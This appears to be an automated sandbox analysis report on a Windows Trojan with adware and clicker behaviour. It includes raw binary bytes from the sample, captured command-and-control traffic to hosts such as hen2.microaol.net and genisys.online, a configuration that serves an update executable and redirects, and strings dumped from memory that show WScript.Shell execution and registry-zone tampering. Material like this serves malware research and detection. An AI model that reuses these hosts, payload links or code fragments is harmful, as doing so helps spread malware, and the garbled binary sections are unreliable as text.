PK.........YVH................install.infUX...{.V.{.V....uR]k.0.}/.?..7. 2...vcc*Ce.tH.^.`......_.....S..9.~e......a.`....@..7&2yR.l.l....#..Ic.R.J..A.`.$....q.J'.IkX.....Y.d.1..G...~....%.......,.C......cYT....ao.u....'...GN...]......Y]g0.......%8.B.0......XFLv........M.!...2.-.ZP..........JH|.....k....3UpZ.S6y".'..>I.GS*h..y..V...io..h.... .A......0.G.8.B.t.x.....i...7.....M....i{a..."l..5...'....\.n..|...S....<..PK....B.j.......PK.........Q[H................XBLive.exeUX.....V$..V......{|.E..>..,.8.,....\q............5j. Q#&...n.$hp......CQ..O.....0...S.AN.!.E.Y....7.UU...&....~....??..............=v.`....WW'....K..._..]...k..[l......kvAa..h..Gg<......N..s=..k....p. ..{\.M...w.V..9.....i.c/...sH0.Z.L.0#G............r.v.l..s.aV.:1.^:....,....l,.M...qB..>4NXm.}.v....U........H..{d..~.*.a.a[..y...........7.X...%9Q......YFj..Ih.........1.....v.#..t..7.............pMCxM..........FLs=./.....~..[......N......y.......|oJ..~}R.<..o......<....5.:,./....,....-%.......R.......<d..{....._.w.80p.4y.....>.."..dv..).6...U................R..U..n......gb@......Q...BQ...RV....6...5....V.....o6.Z.C)..t.Vc.j.?.@...d...v.;...H..,. ..>...../pV..M.F9#Q.H.$7..JS......f.Ok..tH....n .8..V>....2=...f.[Y..I.).@&."....,.h5c...........Y....(|u""Rp..........@...............,HM.0.k.W.j.TmkG=...........RN.1.8b.... .7.P...].....ot..g'.(..~...FJ..l.....c.fe.LU..7..4(9..... .?.L......R]..|.Y...XWWo<T....0...../s...>.....C..........[)y.".P].{....u.]m...h=.Q.}.tW/...m. %!}.2.....M).n..)n...v@.dP.@..._.......@
<<< skipped >>>
POST hXXp://hen2.microaol.net/api HTTP/1.1
Content-Type: application/json
Content-Length: 198
Yzp7cHl2dn10OiI6fH1qfXtzbWs6NDp9bn12bDoiOmtseWpsOjQ6cXw6Ii80OnR3
e3l0fToiKSgrKzQ6aGp3fG17bDoiOl5qcW5UeW12e3B9ajo0Om1tcXw6IjpjKnos
Kip5ICwhfXp8LCx8KiF eS99LSB9fCl6ICB LX5lOjQ6bn1qa3F3djoiOio2KTpl
HTTP/1.1 200 OK
Content-Length: 39
Content-Type: application/json
Date: Wed, 11 May 2016 21:18:07 GMT
{"rc":0,"st":1463001487,"payroll":null}..
POST /upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 178.33.69.66
Content-Length: 236
Cache-Control: no-cache
I21F3cM/AoSf lEcGrGqs1 vcKjRRcc2OgPH4txv0YZ 24G2khb6H6/e6RXwLDdAWJ4E /nS Nscth32/vuQGaIVy Hfu9BdZ8m2vBmoGEjUVvXgvjg5vl31Zq3tfdfRb8ia9gjDY9OTotW8gAcWUM9xilQN4ROnLUuC 60MSjISO6iY4JU10NilwsJezJLoKtf5pn8yPFUzsFK 3zbT5yGdeaO0P9mbFBqL1CD9xuz5
HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 11 May 2016 21:17:23 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 208
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.</body></html>.HTTP/1.1 404 Not Found..Server: nginx..Date: Wed, 11 May 2016 21:17:23 GMT..Content-Type: text/html; charset=iso-8859-1..Content-Length: 208..Connection: keep-alive..Keep-Alive: timeout=60..Vary: Accept-Encoding..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.</body></html>...
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.microsoft.com
HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: hXXp://VVV.microsoft.com/uk-ua/
Date: Wed, 11 May 2016 21:17:23 GMT
Connection: keep-alive
X-CCC: SE
X-CID: 2
HTTP/1.1 302 Moved Temporarily..Server: AkamaiGHost..Content-Length: 0..Location: hXXp://VVV.microsoft.com/uk-ua/..Date: Wed, 11 May 2016 21:17:23 GMT..Connection: keep-alive..X-CCC: SE..X-CID: 2..HTTP/1.1 302 Moved Temporarily..Server: AkamaiGHost..Content-Length: 0..Location: http://VVV.microsoft.com/uk-ua/..Date: Wed, 11 May 2016 21:17:23 GMT..Connection: keep-alive..X-CCC: SE..X-CID: 2..HTTP/1.1 302 Moved Temporarily..Server: AkamaiGHost..Content-Length: 0..Location: hXXp://VVV.microsoft.com/uk-ua/..Date: Wed, 11 May 2016 21:17:23 GMT..Connection: keep-alive..X-CCC: SE..X-CID: 2..HTTP/1.1 302 Moved Temporarily..Server: AkamaiGHost..Content-Length: 0..Location: hXXp://VVV.microsoft.com/uk-ua/..Date: Wed, 11 May 2016 21:17:23 GMT..Connection: keep-alive..X-CCC: SE..X-CID: 2......
GET /uk-ua/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.microsoft.com
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/8.0
CorrelationVector: yfCcznapsU2gXoc6.1.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Credentials: true
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Frame-Options: SAMEORIGIN
Content-Length: 61702
Date: Wed, 11 May 2016 21:17:24 GMT
Connection: keep-alive
Set-Cookie: MS-CV=yfCcznapsU2gXoc6.1; domain=.microsoft.com; expires=Thu, 12-May-2016 21:17:24 GMT; path=/
Set-Cookie: MS-CV=yfCcznapsU2gXoc6.2; domain=.microsoft.com; expires=Thu, 12-May-2016 21:17:24 GMT; path=/
X-CCC: SE
X-CID: 2
...<!DOCTYPE html ><html xmlns:mscom="hXXp://schemas.microsoft.com/CMSvNext" xmlns:md="hXXp://schemas.microsoft.com/mscom-data" lang="uk-ua" xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="//VVV.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="//ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js">.. // Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - hXXp://VVV.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" language="javascript">/*<![CDATA[*/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewportStyle.appendChild(document.createTextNode("@-ms-viewport{width:auto!important}"));document.getElementsByTagName("head")[0].appendChild(msViewportStyle)}/*]]>*/</script><title>Microsoft..... ................ .............. ................</title><meta name="Title" content="Microsoft..... ................ .............. ................" /><meta name="CorrelationVector" content="yfCcznapsU2gXoc6.1" /><meta name="Description" content="......
<<< skipped >>>
POST /upload.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 178.33.69.66
Content-Length: 252
Cache-Control: no-cache
eDFG25RpA4HXUB9aA57v4Jf/LX4Yb X7Qjgzl5gDgWnn5dEeL6hz0k8hvVjRbkndxMyI2gxoKDsZgIA1536p4VJzxMwfr8r30dsyCJ6GYNQrJi/UQIsgcaHwbPLw62bJUkpk9smhN3IyYxe3l8/2qhz1/hkGKemUVUm7BqNbsuicwahjd32U5Vd2O2bGOxJIgACIRUyFy YZjDSNgdjn4gIGoEwvz9vpM4v5qL Qz6gccxjE3NTrREHtYzU=
HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 11 May 2016 21:17:23 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 208
Connection: keep-alive
Keep-Alive: timeout=60
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.</body></html>.HTTP/1.1 404 Not Found..Server: nginx..Date: Wed, 11 May 2016 21:17:23 GMT..Content-Type: text/html; charset=iso-8859-1..Content-Length: 208..Connection: keep-alive..Keep-Alive: timeout=60..Vary: Accept-Encoding..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.</body></html>...
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 69.87.192.155
Content-Length: 408
Cache-Control: no-cache
dm0QjMM9U8cXsnF7FTbIGOCM5CPbNHQkqyrw22LVodJJB x1xEj1RZr7FhA8rTDmdi1eNhFKDExvAzmqDFVi2KhiMmh mqHjdGMiPsBbysLNqjnHAHNrY2joVCbrKluaa RxkZCYmABbj0CAUy2E0NlQit1wUs1IMeoddssft8Stb8RvGHH8ZJhek1prBxKflsDQx33wWW8kBjovjfgpe9iUSZSKg2SA2M7xN6uRr47BHcdYho0H NT/KmXdMk3EDcqr2fsPDHss90EVJCtB00phL2ZzgKI9xrEXWNqG13xdhs91LhdFjR/5cVljSeHbJuyH5xJO6NlfmLc0jRPwbU3 nAxqYpFnYDdegD4a3R8Wp0DaW6OsbivXdnpLYeSUHtHsr8msTrxL zmZ3kOexHU=
HTTP/1.1 200 OK
Connection: close
Date: Wed, 11 May 2016 21:17:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26633
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASBCQCDC=MELFGAMBCBPDKDIOKADFMLAF; path=/
Cache-control: private
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />..<title>......1.4318,1.4462....,15crmo....22053,s31803........,17-4ph......</title>..<meta name="keywords" content="......1.4318,1.4462....,15crmo....22053,s31803........,17-4ph......" />..<meta name="description" content="......1.4318,1.4462....,15crmo....22053,s31803........,17-4ph......" />..<link rel="stylesheet" type="text/css" href="http://69.87.192.155/css.asp?smbdjedjei">..<link href="hXXp://69.87.192.155/mb/26/images/css.css" rel="stylesheet" type="text/css" />..<link href="hXXp://69.87.192.155/mb/26/images/51mybao.css" rel="stylesheet" type="text/css" />..<link href="hXXp://69.87.192.155/mb/26/images/p-list.css" rel="stylesheet" type="text/css" />..<body>..<div class="top">..<div id="top_content">..<div id="top_left">..<a href="hXXp://69.87.192.155/smbdjedjei-37413/">dn180..........</a>|..<a href="hXXp://69.87.192.155/smbdjedjei-37854/">f60..........</a>|..<a href="hXXp://69.87.192.155/smbdjedjei-38295/">gh4145....</a>|..<a href="http://69.87.192.155/smbdjedjei-38736/">incoloy825....</a>|..<a href="hXXp://69.87.192.155/smbdjedjei-39177/">inconel....</a>|..<a href="hXXp://69.87.192.155/smbdjedjei-39618/">n10665..
<<< skipped >>>
GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.microsoft.com
Cache-Control: no-cache
Cookie: MS-CV=yfCcznapsU2gXoc6.2
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT
Accept-Ranges: bytes
ETag: "6d3979883b49ca1:0"
Server: Microsoft-IIS/8.5
Content-Disposition: attachment
Content-Length: 6156064
Date: Wed, 11 May 2016 21:17:26 GMT
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#pA.B...B...B..gM...B...B...B..gMC..B..gMA..B..gM@..B..gMD..B..Rich.B..........................PE..L....jkG.............................c... ........... ................................^.......... ......................................x.............]. ........... "...............................&..@............ ...............................text........ ...................... ..`.data...............................@....rsrc...x........H].................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................l...V...:..."...............................|...................................(...r...d...T.......*...........P...j...................<...................\.......................................>...L...^...n...........................................2...L.......h...p.......................................(...>...L...`...v...................................N...>...,...................d...........................................................z...,...<...J...\...|.......N...Z...d...n...@....
<<< skipped >>>
Q...y?...0R..J..sI..pZ.)$.ft..)........G.(CwW{... ....%{...._?F.Nb..4])o..e.b{..v.V..
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Wed, 11 May 2016 21:17:23 GMT
Connection: close
Content-Length: 35
<h1>Bad Request (Invalid Verb)</h1>..
GET /browser.jsonp HTTP/1.1
Host: genisys.online
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 11 May 2016 21:16:48 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d2f421bdf8e89fa5b74fdc38460a791651463001408; expires=Thu, 11-May-17 21:16:48 GMT; path=/; domain=.genisys.online; HttpOnly
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Set-Cookie: CAKEPHP=pe4o11m4je6kqalqh98umh3g63; expires=Thu, 12-May-2016 01:16:48 GMT; Max-Age=14400; path=/; HttpOnly
cfffi: UA
caching-disabled: 0
Server: cloudflare-nginx
CF-RAY: 2a18a77007c216c4-ARN
4bf..SMInitCallback({"Settings":{"google_tracking_id":"UA-73331235-1","cookies_time":86400},"Update":{"version":"0.1","url":"http:\/\/VVV.genisys.online\/public\/70bdc32ebc2a.exe","param":""},"banners":[],"htmlblock":[],"socialadv":[{"title":"Don't Lose Your Digital Life! ","description":"It's 100% Free!","url":"http:\/\/VVV.mb01.com\/lnk.asp?o=5018&a=183219&c=57410","type":"facebook","image":"http:\/\/2.bp.blogspot.com\/-fG-cuYLBqkE\/UBu6s8Ash5I\/AAAAAAAAADM\/Z-3EtYGIMcw\/s1600\/mypcbackup backup your life.jpg","country":""},{"title":"Don't Lose Your Digital Life! ","description":"It's 100% Free!","url":"http:\/\/VVV.mb01.com\/lnk.asp?o=5018&a=183219&c=57410","type":"youtube","image":"http:\/\/2.bp.blogspot.com\/-fG-cuYLBqkE\/UBu6s8Ash5I\/AAAAAAAAADM\/Z-3EtYGIMcw\/s1600\/mypcbackup backup your life.jpg","country":""}],"blackList":[],"customScripts":[{"url":"http:\/\/VVV.genisys.online\/custom.js","protocol":1},{"url":"https:\/\/VVV.genisys.online\/customHTTPS.js","protocol":2}],"triggerDomains":[],"triggerLinks":{"usa.com":{"redirect":"http:\/\/VVV.adwareroi.com\/?keyword={{KEY}}&subid={{SUBID}}&userid={{USERID}}","window_height":"800","window_width":"800","country":"","time":false}},"country":"UA"})..0..
<<< skipped >>>
r...v:...<..f.....v...ed.p.IL...H..4...W].P...I}.7.n...........Wuc.O. .Km...3L.o~...-3.tV.....x^...YO...V.........z.CB
HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 11 May 2016 21:17:29 GMT
Connection: close
Content-Length: 326
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Bad Request</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>..<BODY><h2>Bad Request - Invalid Verb</h2>..<hr><p>HTTP Error 400. The request verb is invalid.</p>..</BODY></HTML>....
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: microsoft.com
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.microsoft.com/
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Wed, 11 May 2016 21:17:23 GMT
Content-Length: 148
<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>HTTP/1.1 301 Moved Permanently..Content-Type: text/html; charset=UTF-8..Location: hXXp://VVV.microsoft.com/..Server: Microsoft-IIS/8.5..X-Powered-By: ASP.NET..Date: Wed, 11 May 2016 21:17:23 GMT..Content-Length: 148..<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>..
POST hXXp://hen2.microaol.net/api HTTP/1.1
Content-Type: application/json
Content-Length: 216
Yzp6andva31qOiI6OjQ6e3B5dnZ9dDoiOnx9an17c21rOjQ6fW59dmw6Ijp/fWw6
NDpxfDoiLzQ6dHd7eXR9OiIpKCsrNDpoand8bXtsOiI6XmpxblR5bXZ7cH1qOjQ6
bW1xfDoiOmMqeiwqKnkgLCF9enwsLHwqIX55L30tIH18KXogIH4tfmU6NDpufWpr
cXd2OiI6KjYpOmU=
HTTP/1.1 302 Found
Location: hXXp://hen2.microaol.net/f/go184.7531c668845f402cb058ad10921a3520.zip
Date: Wed, 11 May 2016 21:18:08 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
GET /browser.jsonp HTTP/1.1
Host: genisys.online
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 11 May 2016 21:16:58 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d08ae627aef3d5d16e727a6ce4a8af1131463001418; expires=Thu, 11-May-17 21:16:58 GMT; path=/; domain=.genisys.online; HttpOnly
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Set-Cookie: CAKEPHP=cblnu4h61fme4stsiu2p3ocbs2; expires=Thu, 12-May-2016 01:16:58 GMT; Max-Age=14400; path=/; HttpOnly
cfffi: UA
caching-disabled: 0
Server: cloudflare-nginx
CF-RAY: 2a18a7b0bde2370e-ARN
4bf..SMInitCallback({"Settings":{"google_tracking_id":"UA-73331235-1","cookies_time":86400},"Update":{"version":"0.1","url":"http:\/\/VVV.genisys.online\/public\/70bdc32ebc2a.exe","param":""},"banners":[],"htmlblock":[],"socialadv":[{"title":"Don't Lose Your Digital Life! ","description":"It's 100% Free!","url":"http:\/\/VVV.mb01.com\/lnk.asp?o=5018&a=183219&c=57410","type":"facebook","image":"http:\/\/2.bp.blogspot.com\/-fG-cuYLBqkE\/UBu6s8Ash5I\/AAAAAAAAADM\/Z-3EtYGIMcw\/s1600\/mypcbackup backup your life.jpg","country":""},{"title":"Don't Lose Your Digital Life! ","description":"It's 100% Free!","url":"http:\/\/VVV.mb01.com\/lnk.asp?o=5018&a=183219&c=57410","type":"youtube","image":"http:\/\/2.bp.blogspot.com\/-fG-cuYLBqkE\/UBu6s8Ash5I\/AAAAAAAAADM\/Z-3EtYGIMcw\/s1600\/mypcbackup backup your life.jpg","country":""}],"blackList":[],"customScripts":[{"url":"http:\/\/VVV.genisys.online\/custom.js","protocol":1},{"url":"https:\/\/VVV.genisys.online\/customHTTPS.js","protocol":2}],"triggerDomains":[],"triggerLinks":{"usa.com":{"redirect":"http:\/\/VVV.adwareroi.com\/?keyword={{KEY}}&subid={{SUBID}}&userid={{USERID}}","window_height":"800","window_width":"800","country":"","time":false}},"country":"UA"})..0..
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
regsvr32.exe_2700_rwx_00080000_00132000:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
USER32.DLL
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {var els=document.getElementsByTagName('video'); for(var i=0;i
try {jwplayer().play()} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowser
IWebBrowserApp
IWebBrowserApp
IWebBrowser2
IWebBrowser2
.length;
.length;
=String.fromCharCode(parseInt(
=String.fromCharCode(parseInt(
.substr(
.substr(
,2),16));
,2),16));
=String.fromCharCode(
=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt()^
,1).charCodeAt());
,1).charCodeAt());
.length-1)?
.length-1)?
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Environment("Process"))("
.Run("
.Run("
=new ActiveXObject("WScript.Shell");
=new ActiveXObject("WScript.Shell");
.RegRead("
.RegRead("
psapi.dll
psapi.dll
HTTP/1.1
HTTP/1.1
\\.\LCD
\\.\LCD
1234567890
1234567890
Shell32.dll
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
0123456789
Mozilla
Mozilla
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.text
.text
`.rdata
`.rdata
@.pdata
@.pdata
KERNEL32.dll
KERNEL32.dll
@.reloc
@.reloc
222.dll
222.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
RegOpenKeyExW
RegOpenKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyW
RegCreateKeyA
RegCreateKeyA
version.dll
version.dll
gdi32.dll
gdi32.dll
SetProcessWindowStation
SetProcessWindowStation
OpenWindowStationA
OpenWindowStationA
EnumChildWindows
EnumChildWindows
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ole32.dll
ole32.dll
wsock32.dll
wsock32.dll
winmm.dll
winmm.dll
atl.dll
atl.dll
wtsapi32.dll
wtsapi32.dll
Wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
PSAPI.DLL
shell32.dll
shell32.dll
ShellExecuteExW
ShellExecuteExW
NtQueryValueKey
NtQueryValueKey
NtDeleteValueKey
NtDeleteValueKey
NtSetValueKey
NtSetValueKey
urlmon.dll
urlmon.dll
UrlMkSetSessionOption
UrlMkSetSessionOption
4"4,414?4
4"4,414?4
4,41494^4
4,41494^4
6%6X6v6
6%6X6v6
6*636@6~6
6*636@6~6
>0>>>[>~>
>0>>>[>~>
6%6s6
6%6s6
67
67
7%7X7
7%7X7
3%4,41464
3%4,41464
6-676H6l6v6}6
6-676H6l6v6}6
Uh.EE
Uh.EE
WindowsUpdate
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
c:\docume~1\"%CurrentUserName%"\locals~1\temp\nsq2.tmp\clicker\clicker.exe /s path>path inj_ffile>inj_ffile
c:\docume~1\"%CurrentUserName%"\locals~1\temp\nsq2.tmp\clicker\clicker.exe /s path>path inj_ffile>inj_ffile
regsvr32.exe_2700:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
USER32.DLL
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
